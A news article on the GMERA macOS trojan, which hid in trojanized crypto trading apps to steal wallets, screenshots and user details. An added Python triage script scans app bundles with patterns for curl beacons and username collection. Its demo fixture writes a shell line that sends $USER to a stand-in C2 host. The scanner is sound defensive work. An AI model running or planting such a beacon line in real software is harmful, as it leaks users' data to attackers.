Reports have emerged that crypto scammers have stolen considerable amounts of cryptocurrency from traders. The cybercriminals are using a new trojan that targets trading applications on Apple's macOS; the attack uses malware known as GMERA.

An extensive study by the internet security company ESET found that this malware is embedded in legitimate-looking crypto trading applications. Once installed on the user's device, the malware attempts to steal crypto funds from their wallets.


A group of researchers at the cybersecurity firm Trend Micro originally discovered the GMERA malware in September 2019. At the time, the malware was posing as the Mac-specific stock investment application Stockfolio.

The researchers found two variants of the malware family in use by crypto scammers and other criminals. The first uses a pair of shell scripts and can connect to a remote site to decrypt its encrypted code. The second sample uses a simpler routine consisting of a single shell script, but it incorporates a persistence mechanism.

The Two Malware Versions

Trojan.MacOS.GMERA.A was flagged by a machine learning system. Its malicious behavior was hard to identify at first because the shell script references other files, including AppCode, .pass, and .app. To confirm that the behavior was malicious, the researchers retrieved the parent file using their own infrastructure and the aggregation website VirusTotal, and found the trojan well hidden inside genuine-looking files.


Trojan.macOS.GMERA.B was discovered by pivoting on the digital certificate of the first sample. It was uploaded to VirusTotal in June 2019. Like the first variant, the trojan contained an embedded copy of Stockfolio.app version 1.4.13 signed with the malware author's digital certificate, and it likewise launches the app whenever it is executed to hide its malicious intent.

After it is opened, Trojan.macOS.GMERA.B executes the embedded copy of Stockfolio version 1.4.13 and then launches the shell script run.sh. The script then collects the IP addresses and usernames of the infected machines.

Kattana Application Targeted

ESET also noted that the malware operators have integrated GMERA variants into the original macOS Kattana crypto trading platform. They have also meticulously copied the firm's website, and the crypto scammers are now promoting up to four copycat applications: Cupatrade, Licatrade, Cointrazer, and Trezarus.


The fake apps come packed with malware, and their sites offer a download button that serves a ZIP archive containing the trojanized version of the application. According to the ESET report, all of these apps retain full support for the trading functionality. The report reads:

“For a person who doesn’t know Kattana, the websites do look legitimate.”

The crypto scammers have been contacting their victims directly and repeatedly, according to the researchers. Additionally, they have been continuously “socially engineering them” to download the infected app.

Trojan Overview

ESET researchers also tested several samples from Licatrade aiming to analyze and understand the malware. Based on their findings, it has a few differences compared to the malware that was discovered on the other applications. Nonetheless, it still functions similarly.

The crypto scammers use the trojan to install a shell script on the targeted device, giving the criminals significant access to the user's system through the application. The shell script then sets up communication with command-and-control servers (also known as C2 or C&C) over HTTP, operating between the attackers' infrastructure and the victim's system.


Interestingly, the C2 servers let the criminals communicate with the targeted machine continuously. Based on the findings, the GMERA malware steals a variety of information, including the victim's location, crypto wallets, screen captures, and usernames.
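The behaviour described above (a trojanized bundle that carries a nested copy of the legitimate app, launches it from a shell script, gathers the username and host details, and talks to a C2 server over HTTP) can be turned into a simple triage check. The script below is an added example, not ESET's or Trend Micro's tooling; the indicator names, regexes and the constructed sample bundle layout are this example's own assumptions.

```python
import os
import re
import tempfile

# Heuristics drawn from the article's description: a trojanized bundle carries a nested copy
# of the legitimate app plus a shell script that launches it, gathers host details and
# reports over HTTP. The indicator names and patterns are this example's own assumptions.
INDICATORS = {
    "launches_nested_app": re.compile(r"\bopen\b[^\n]*\.app"),
    "collects_username": re.compile(r"\bwhoami\b|\$USER\b"),
    "collects_ip": re.compile(r"\bifconfig\b|\bipconfig\b"),
    "http_beacon": re.compile(r"\bcurl\b[^\n]*https?://"),
}

def _is_script(path):
    if path.endswith(".sh"):
        return True
    with open(path, "rb") as fh:
        return fh.read(2) == b"#!"

def triage_bundle(bundle):
    """Walk an .app bundle; report nested .app dirs and indicator hits per shell script."""
    findings = {"nested_apps": [], "scripts": {}}
    for root, dirs, files in os.walk(bundle):
        for d in dirs:
            if d.endswith(".app"):
                findings["nested_apps"].append(os.path.relpath(os.path.join(root, d), bundle))
        for f in files:
            path = os.path.join(root, f)
            if _is_script(path):
                with open(path, errors="replace") as fh:
                    text = fh.read()
                findings["scripts"][os.path.relpath(path, bundle)] = sorted(
                    name for name, rx in INDICATORS.items() if rx.search(text))
    return findings

def is_suspicious(findings):
    # The combination the article describes: a nested app launched by a script that also beacons out.
    return bool(findings["nested_apps"]) and any(
        {"launches_nested_app", "http_beacon"} <= set(hits) for hits in findings["scripts"].values())

def demo():
    """Build a constructed, non-functional bundle layout in a temp dir and triage it."""
    base = tempfile.mkdtemp()
    res = os.path.join(base, "Trojanized.app", "Contents", "Resources")
    os.makedirs(os.path.join(res, "Legit.app", "Contents", "MacOS"))
    with open(os.path.join(res, "run.sh"), "w") as fh:  # constructed stand-in for run.sh
        fh.write('#!/bin/bash\nopen "$(dirname "$0")/Legit.app"\nwhoami\n'
                 'curl -s http://c2.example.invalid/ -d "u=$USER"\n')
    return triage_bundle(os.path.join(base, "Trojanized.app"))

if __name__ == "__main__":
    found = demo()
    print(found, is_suspicious(found))
```

Run it against a real bundle with `triage_bundle("/Applications/Some.app")`; a hit is a reason to check the bundle's code signature and origin, not proof of infection.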

ESET said that it reported the matter to Apple, and the certificate Apple had issued to Licatrade was revoked within a few hours. The other two certificates used for the remaining apps had already been revoked by the time the related attacks were attempted.

About the author

Wanguba Muriuki is an Editor at Large for E-Crypto News and author of the book- "The Exploitative Intrigues of Cryptocurrency Scams Explained." He is also a passionate creator who sees every aspect of life from a written perspective. He loves Blockchain, Cryptocurrency, Technology, and Traveling. He is a widely experienced creative and technical writer. Everything and everyone is describable. The best description is written.
